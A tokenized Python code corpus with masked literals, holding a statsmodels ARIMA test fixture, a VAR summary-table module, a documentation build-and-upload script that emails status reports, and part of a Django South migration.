<EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> icstats = np . array ( [ <NUM_LIT> , <EOL> np . nan , <EOL> - <NUM_LIT> , <EOL> <NUM_LIT:4> , <EOL> <NUM_LIT> , <EOL> <NUM_LIT> ] ) <EOL> class Bunch ( dict ) : <EOL> def __init__ ( self , ** kw ) : <EOL> dict . __init__ ( self , kw ) <EOL> self . __dict__ = self <EOL> results = Bunch ( llf = llf , nobs = nobs , k = k , k_exog = k_exog , sigma = sigma , chi2 = chi2 , df_model = df_model , k_ar = k_ar , k_ma = k_ma , params = params , cov_params = cov_params , xb = xb , y = y , resid = resid , yr = yr , mse = mse , stdp = stdp , icstats = icstats , ) </s>
<s> from __future__ import print_function <EOL> from statsmodels . compat . python import cStringIO , lzip , lrange , StringIO , range <EOL> import numpy as np <EOL> from statsmodels . iolib import SimpleTable <EOL> import statsmodels . tsa . vector_ar . util as util <EOL> mat = np . array <EOL> _default_table_fmt = dict ( <EOL> empty_cell = '<STR_LIT>' , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> row_pre = '<STR_LIT>' , <EOL> row_post = '<STR_LIT>' , <EOL> table_dec_above = '<STR_LIT:=>' , <EOL> table_dec_below = '<STR_LIT:=>' , <EOL> header_dec_below = '<STR_LIT:->' , <EOL> header_fmt = '<STR_LIT:%s>' , <EOL> stub_fmt = '<STR_LIT:%s>' , <EOL> title_align = '<STR_LIT:c>' , <EOL> header_align = '<STR_LIT:r>' , <EOL> data_aligns = '<STR_LIT:r>' , <EOL> stubs_align = '<STR_LIT:l>' , <EOL> fmt = '<STR_LIT>' <EOL> ) <EOL> class VARSummary ( object ) : <EOL> default_fmt = dict ( <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> empty_cell = '<STR_LIT>' , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> row_pre = '<STR_LIT>' , <EOL> row_post = '<STR_LIT>' , <EOL> table_dec_above = '<STR_LIT:=>' , <EOL> table_dec_below = '<STR_LIT:=>' , <EOL> header_dec_below = '<STR_LIT:->' , <EOL> header_fmt = '<STR_LIT:%s>' , <EOL> stub_fmt = '<STR_LIT:%s>' , <EOL> title_align = '<STR_LIT:c>' , <EOL> header_align = '<STR_LIT:r>' , <EOL> data_aligns = '<STR_LIT:r>' , <EOL> stubs_align = '<STR_LIT:l>' , <EOL> fmt = '<STR_LIT>' <EOL> ) <EOL> part1_fmt = dict ( default_fmt , <EOL> data_fmts = [ "<STR_LIT:%s>" ] , <EOL> colwidths = <NUM_LIT:15> , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> table_dec_below = '<STR_LIT>' , <EOL> header_dec_below = None , <EOL> ) <EOL> part2_fmt = dict ( default_fmt , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] , <EOL> colwidths = None , <EOL> colsep = '<STR_LIT:U+0020>' , <EOL> table_dec_above = '<STR_LIT:->' , <EOL> table_dec_below = '<STR_LIT:->' , <EOL> header_dec_below = None , <EOL> ) <EOL> def __init__ ( self , estimator ) : <EOL> self . model = estimator <EOL> self . summary = self . make ( ) <EOL> def __repr__ ( self ) : <EOL> return self . summary <EOL> def make ( self , endog_names = None , exog_names = None ) : <EOL> """<STR_LIT>""" <EOL> buf = StringIO ( ) <EOL> buf . write ( self . _header_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _stats_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _coef_table ( ) + '<STR_LIT:\n>' ) <EOL> buf . write ( self . _resid_info ( ) + '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def _header_table ( self ) : <EOL> import time <EOL> model = self . model <EOL> t = time . localtime ( ) <EOL> part1title = "<STR_LIT>" <EOL> part1data = [ [ model . _model_type ] , <EOL> [ "<STR_LIT>" ] , <EOL> [ time . strftime ( "<STR_LIT>" , t ) ] , <EOL> [ time . strftime ( "<STR_LIT>" , t ) ] ] <EOL> part1header = None <EOL> part1stubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part1 = SimpleTable ( part1data , part1header , part1stubs , <EOL> title = part1title , txt_fmt = self . part1_fmt ) <EOL> return str ( part1 ) <EOL> def _stats_table ( self ) : <EOL> model = self . model <EOL> part2Lstubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part2Rstubs = ( '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ) <EOL> part2Ldata = [ [ model . neqs ] , [ model . nobs ] , [ model . llf ] , [ model . aic ] ] <EOL> part2Rdata = [ [ model . bic ] , [ model . hqic ] , [ model . fpe ] , [ model . detomega ] ] <EOL> part2Lheader = None <EOL> part2L = SimpleTable ( part2Ldata , part2Lheader , part2Lstubs , <EOL> txt_fmt = self . part2_fmt ) <EOL> part2R = SimpleTable ( part2Rdata , part2Lheader , part2Rstubs , <EOL> txt_fmt = self . part2_fmt ) <EOL> part2L . extend_right ( part2R ) <EOL> return str ( part2L ) <EOL> def _coef_table ( self ) : <EOL> model = self . model <EOL> k = model . neqs <EOL> Xnames = self . model . exog_names <EOL> data = lzip ( model . params . T . ravel ( ) , <EOL> model . stderr . T . ravel ( ) , <EOL> model . tvalues . T . ravel ( ) , <EOL> model . pvalues . T . ravel ( ) ) <EOL> header = ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) <EOL> buf = StringIO ( ) <EOL> dim = k * model . k_ar + model . k_trend <EOL> for i in range ( k ) : <EOL> section = "<STR_LIT>" % model . names [ i ] <EOL> buf . write ( section + '<STR_LIT:\n>' ) <EOL> table = SimpleTable ( data [ dim * i : dim * ( i + <NUM_LIT:1> ) ] , header , <EOL> Xnames , title = None , txt_fmt = self . default_fmt ) <EOL> buf . write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> if i < k - <NUM_LIT:1> : <EOL> buf . write ( '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def _resid_info ( self ) : <EOL> buf = StringIO ( ) <EOL> names = self . model . names <EOL> buf . write ( "<STR_LIT>" + '<STR_LIT:\n>' ) <EOL> buf . write ( pprint_matrix ( self . model . resid_corr , names , names ) + '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def causality_summary ( results , variables , equation , kind ) : <EOL> title = "<STR_LIT>" % kind <EOL> null_hyp = '<STR_LIT>' % ( variables , equation ) <EOL> return hypothesis_test_table ( results , title , null_hyp ) <EOL> def normality_summary ( results ) : <EOL> title = "<STR_LIT>" <EOL> null_hyp = '<STR_LIT>' <EOL> return hypothesis_test_table ( results , title , null_hyp ) <EOL> def hypothesis_test_table ( results , title , null_hyp ) : <EOL> fmt = dict ( _default_table_fmt , <EOL> data_fmts = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:%s>" ] ) <EOL> buf = StringIO ( ) <EOL> table = SimpleTable ( [ [ results [ '<STR_LIT>' ] , <EOL> results [ '<STR_LIT>' ] , <EOL> results [ '<STR_LIT>' ] , <EOL> str ( results [ '<STR_LIT>' ] ) ] ] , <EOL> [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] , [ '<STR_LIT>' ] , title = None , txt_fmt = fmt ) <EOL> buf . write ( title + '<STR_LIT:\n>' ) <EOL> buf . write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> buf . write ( null_hyp + '<STR_LIT:\n>' ) <EOL> buf . write ( "<STR_LIT>" % results [ '<STR_LIT>' ] ) <EOL> buf . write ( "<STR_LIT>" % ( results [ '<STR_LIT>' ] * <NUM_LIT:100> ) ) <EOL> return buf . getvalue ( ) <EOL> def print_ic_table ( ics , selected_orders ) : <EOL> """<STR_LIT>""" <EOL> cols = sorted ( ics ) <EOL> data = mat ( [ [ "<STR_LIT>" % v for v in ics [ c ] ] for c in cols ] , <EOL> dtype = object ) . T <EOL> for i , col in enumerate ( cols ) : <EOL> idx = int ( selected_orders [ col ] ) , i <EOL> data [ idx ] = data [ idx ] + '<STR_LIT:*>' <EOL> fmt = dict ( _default_table_fmt , <EOL> data_fmts = ( "<STR_LIT:%s>" , ) * len ( cols ) ) <EOL> buf = StringIO ( ) <EOL> table = SimpleTable ( data , cols , lrange ( len ( data ) ) , <EOL> title = '<STR_LIT>' , txt_fmt = fmt ) <EOL> buf . write ( str ( table ) + '<STR_LIT:\n>' ) <EOL> buf . write ( '<STR_LIT>' + '<STR_LIT:\n>' ) <EOL> print ( buf . getvalue ( ) ) <EOL> def pprint_matrix ( values , rlabels , clabels , col_space = None ) : <EOL> buf = StringIO ( ) <EOL> T , K = len ( rlabels ) , len ( clabels ) <EOL> if col_space is None : <EOL> min_space = <NUM_LIT:10> <EOL> col_space = [ max ( len ( str ( c ) ) + <NUM_LIT:2> , min_space ) for c in clabels ] <EOL> else : <EOL> col_space = ( col_space , ) * K <EOL> row_space = max ( [ len ( str ( x ) ) for x in rlabels ] ) + <NUM_LIT:2> <EOL> head = _pfixed ( '<STR_LIT>' , row_space ) <EOL> for j , h in enumerate ( clabels ) : <EOL> head += _pfixed ( h , col_space [ j ] ) <EOL> buf . write ( head + '<STR_LIT:\n>' ) <EOL> for i , rlab in enumerate ( rlabels ) : <EOL> line = ( '<STR_LIT:%s>' % rlab ) . ljust ( row_space ) <EOL> for j in range ( K ) : <EOL> line += _pfixed ( values [ i , j ] , col_space [ j ] ) <EOL> buf . write ( line + '<STR_LIT:\n>' ) <EOL> return buf . getvalue ( ) <EOL> def _pfixed ( s , space , nanRep = None , float_format = None ) : <EOL> if isinstance ( s , float ) : <EOL> if float_format : <EOL> formatted = float_format ( s ) <EOL> else : <EOL> formatted = "<STR_LIT>" % s <EOL> return formatted . rjust ( space ) <EOL> else : <EOL> return ( '<STR_LIT:%s>' % s ) [ : space ] . rjust ( space ) </s>
<s> """<STR_LIT>""" <EOL> import traceback <EOL> import base64 <EOL> import subprocess <EOL> import os <EOL> import re <EOL> import shutil <EOL> import smtplib <EOL> import sys <EOL> from urllib2 import urlopen <EOL> from email . MIMEText import MIMEText <EOL> import logging <EOL> logging . basicConfig ( filename = '<STR_LIT>' <EOL> '<STR_LIT>' , level = logging . DEBUG , <EOL> format = "<STR_LIT>" ) <EOL> sys . stdout = open ( '<STR_LIT>' , <EOL> '<STR_LIT:w>' ) <EOL> sys . stderr = open ( '<STR_LIT>' , <EOL> '<STR_LIT:w>' ) <EOL> env = { '<STR_LIT>' : ( '<STR_LIT>' ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT::>' . join ( ( os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) , '<STR_LIT>' ) ) , <EOL> '<STR_LIT>' : os . getenv ( '<STR_LIT>' , '<STR_LIT>' ) } <EOL> script = os . path . realpath ( sys . argv [ <NUM_LIT:0> ] ) <EOL> dname = os . path . abspath ( os . path . dirname ( script ) ) <EOL> gname = '<STR_LIT>' <EOL> gitdname = os . path . join ( dname , gname ) <EOL> os . chdir ( dname ) <EOL> logging . debug ( '<STR_LIT>' . format ( script ) ) <EOL> logging . debug ( '<STR_LIT>' . format ( dname ) ) <EOL> sf_account = '<STR_LIT>' <EOL> repo = '<STR_LIT>' <EOL> stable_trunk = '<STR_LIT>' <EOL> last_release = '<STR_LIT>' <EOL> branches = [ stable_trunk ] <EOL> virtual_dir = '<STR_LIT>' <EOL> virtual_dir = os . path . join ( dname , virtual_dir ) <EOL> virtual_python = os . path . join ( virtual_dir , '<STR_LIT>' , '<STR_LIT>' ) <EOL> with open ( '<STR_LIT>' ) as f : <EOL> pwd = f . readline ( ) . strip ( ) <EOL> gmail_pwd = base64 . b64decode ( pwd ) <EOL> email_name = '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' <EOL> email_name = email_name . replace ( '<STR_LIT>' , '<STR_LIT:@>' ) <EOL> gmail_pwd = gmail_pwd <EOL> to_email = [ email_name , <EOL> ( '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' + '<STR_LIT>' ) . replace ( '<STR_LIT>' , '<STR_LIT:@>' ) ] <EOL> def create_virtualenv ( ) : <EOL> if not os . path . exists ( virtual_dir ) : <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , <EOL> "<STR_LIT>" , virtual_dir ] , <EOL> stderr = sys . stderr , stdout = sys . stdout ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> retcode = subprocess . call ( [ virtual_dir + '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> def create_update_gitdir ( ) : <EOL> """<STR_LIT>""" <EOL> if not os . path . exists ( gitdname ) : <EOL> retcode = subprocess . call ( '<STR_LIT>' + repo , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" <EOL> raise Exception ( msg ) <EOL> else : <EOL> shutil . rmtree ( gitdname ) <EOL> create_update_gitdir ( ) <EOL> def check_version ( branch , latest_hash = None ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> regex = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> regex = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> base_url = '<STR_LIT>' <EOL> page = urlopen ( base_url . format ( remote_dir ) ) . read ( ) <EOL> try : <EOL> version = re . search ( regex , page ) . group ( ) <EOL> except AttributeError : <EOL> return True <EOL> if remote_dir == '<STR_LIT>' : <EOL> if last_release [ <NUM_LIT:1> : ] == version : <EOL> return False <EOL> else : <EOL> return True <EOL> if latest_hash == version : <EOL> return False <EOL> else : <EOL> return True <EOL> def getdirs ( ) : <EOL> """<STR_LIT>""" <EOL> dirs = [ i for i in os . listdir ( dname ) ] <EOL> dirs = filter ( lambda x : not os . path . isfile ( os . path . join ( dname , x ) ) , <EOL> dirs ) <EOL> return dirs <EOL> def newdir ( dirs ) : <EOL> """<STR_LIT>""" <EOL> dirs = set ( dirs ) <EOL> newdirs = set ( [ i for i in os . listdir ( dname ) if not <EOL> os . path . isfile ( os . path . join ( dname , i ) ) ] ) <EOL> newdir = newdirs . difference ( dirs ) <EOL> if len ( newdir ) != <NUM_LIT:1> : <EOL> msg = ( "<STR_LIT>" <EOL> "<STR_LIT>" ) <EOL> raise Exception ( msg ) <EOL> newdir = newdir . pop ( ) <EOL> return newdir <EOL> def install_branch ( branch ) : <EOL> """<STR_LIT>""" <EOL> ver = '<STR_LIT:.>' . join ( map ( str , ( sys . version_info . major , sys . version_info . minor ) ) ) <EOL> sitepack = os . path . join ( virtual_dir , '<STR_LIT>' , '<STR_LIT>' + ver , '<STR_LIT>' ) <EOL> if os . path . exists ( sitepack ) : <EOL> dir_list = os . listdir ( sitepack ) <EOL> else : <EOL> dir_list = [ ] <EOL> for f in dir_list : <EOL> if '<STR_LIT>' in f : <EOL> shutil . rmtree ( os . path . join ( sitepack , f ) ) <EOL> os . chdir ( gitdname ) <EOL> retcode = subprocess . call ( '<STR_LIT>' + branch , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> p = subprocess . Popen ( '<STR_LIT>' , shell = True , <EOL> stdout = subprocess . PIPE , stderr = sys . stderr ) <EOL> version = p . communicate ( ) [ <NUM_LIT:0> ] [ : <NUM_LIT:7> ] <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( [ virtual_python , '<STR_LIT>' , '<STR_LIT>' ] ) , <EOL> shell = True , stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( [ virtual_python , os . path . join ( gitdname , <EOL> '<STR_LIT>' ) , '<STR_LIT>' ] ) , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> return version <EOL> def print_info ( ) : <EOL> subprocess . Popen ( [ virtual_python , os . path . join ( gitdname , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ) ] , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> def build_docs ( branch ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( "<STR_LIT>" , shell = True , <EOL> stdout = sys . stdout , stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> sphinx_call = "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' , '<STR_LIT:html>' , "<STR_LIT>" <EOL> "<STR_LIT>" ] ) <EOL> activate = os . path . join ( virtual_dir , "<STR_LIT>" , "<STR_LIT>" ) <EOL> activate_virtualenv = "<STR_LIT>" + activate <EOL> retcode = subprocess . call ( "<STR_LIT>" . join ( [ activate_virtualenv , sphinx_call ] ) , <EOL> shell = True , env = env , stdout = sys . stdout , <EOL> stderr = sys . stderr ) <EOL> if retcode != <NUM_LIT:0> : <EOL> os . chdir ( dname ) <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def build_pdf ( branch ) : <EOL> """<STR_LIT>""" <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> sphinx_dir = os . path . join ( virtual_dir , '<STR_LIT>' ) <EOL> retcode = subprocess . call ( "<STR_LIT:U+0020>" . join ( [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' + sphinx_dir + '<STR_LIT>' ] ) , <EOL> shell = True ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % branch <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def upload_docs ( branch ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> os . chdir ( os . path . join ( gitdname , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , sf_account + '<STR_LIT>' + <EOL> remote_dir ] , <EOL> stderr = sys . stderr , stdout = sys . stdout ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = """<STR_LIT>""" % ( remote_dir , <EOL> branch ) <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def upload_pdf ( branch ) : <EOL> if branch == '<STR_LIT>' : <EOL> remote_dir = '<STR_LIT>' <EOL> else : <EOL> remote_dir = '<STR_LIT>' <EOL> os . chdir ( os . path . join ( dname , new_branch_dir , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> retcode = subprocess . call ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> sf_account + '<STR_LIT>' + remote_dir + '<STR_LIT>' ] ) <EOL> if retcode != <NUM_LIT:0> : <EOL> msg = ( "<STR_LIT>" % <EOL> ( remote_dir + '<STR_LIT>' , branch ) ) <EOL> raise Exception ( msg ) <EOL> os . chdir ( dname ) <EOL> def email_me ( status = '<STR_LIT>' ) : <EOL> if status == '<STR_LIT>' : <EOL> message = """<STR_LIT>""" <EOL> subject = "<STR_LIT>" <EOL> else : <EOL> message = status <EOL> subject = "<STR_LIT>" <EOL> msg = MIMEText ( message ) <EOL> msg [ '<STR_LIT>' ] = subject <EOL> msg [ '<STR_LIT>' ] = email_name <EOL> msg [ '<STR_LIT>' ] = email_name <EOL> server = smtplib . SMTP ( '<STR_LIT>' , <NUM_LIT> ) <EOL> server . ehlo ( ) <EOL> server . starttls ( ) <EOL> server . ehlo ( ) <EOL> server . login ( email_name , gmail_pwd ) <EOL> server . sendmail ( email_name , to_email , msg . as_string ( ) ) <EOL> server . close ( ) <EOL> def main ( ) : <EOL> msg = '<STR_LIT>' <EOL> for branch in branches : <EOL> try : <EOL> create_virtualenv ( ) <EOL> create_update_gitdir ( ) <EOL> version = install_branch ( branch ) <EOL> if check_version ( branch , version ) : <EOL> print_info ( ) <EOL> build_docs ( branch ) <EOL> upload_docs ( branch ) <EOL> else : <EOL> msg += ( '<STR_LIT>' <EOL> '<STR_LIT>' . format ( branch ) ) <EOL> except : <EOL> msg += traceback . format_exc ( ) <EOL> if msg == '<STR_LIT>' : <EOL> email_me ( ) <EOL> else : <EOL> email_me ( msg ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> main ( ) </s>
<s> from south . db import db <EOL> from django . db import models <EOL> from image_filer . models import * <EOL> class Migration : <EOL> def forwards ( self , orm ) : <EOL> db . create_table ( '<STR_LIT>' , ( <EOL> ( '<STR_LIT>' , orm [ '<STR_LIT>' ] ) , <EOL> ( '<STR_LIT>' , orm [ '<STR_LIT>' ] ) , <EOL> ) ) <EOL> db . send_create_signal ( '<STR_LIT>' , [ '<STR_LIT>' ] ) <EOL> def backwards ( self , orm ) : <EOL> db . delete_table ( '<STR_LIT>' ) <EOL> models = { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:password>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:username>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:5>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , 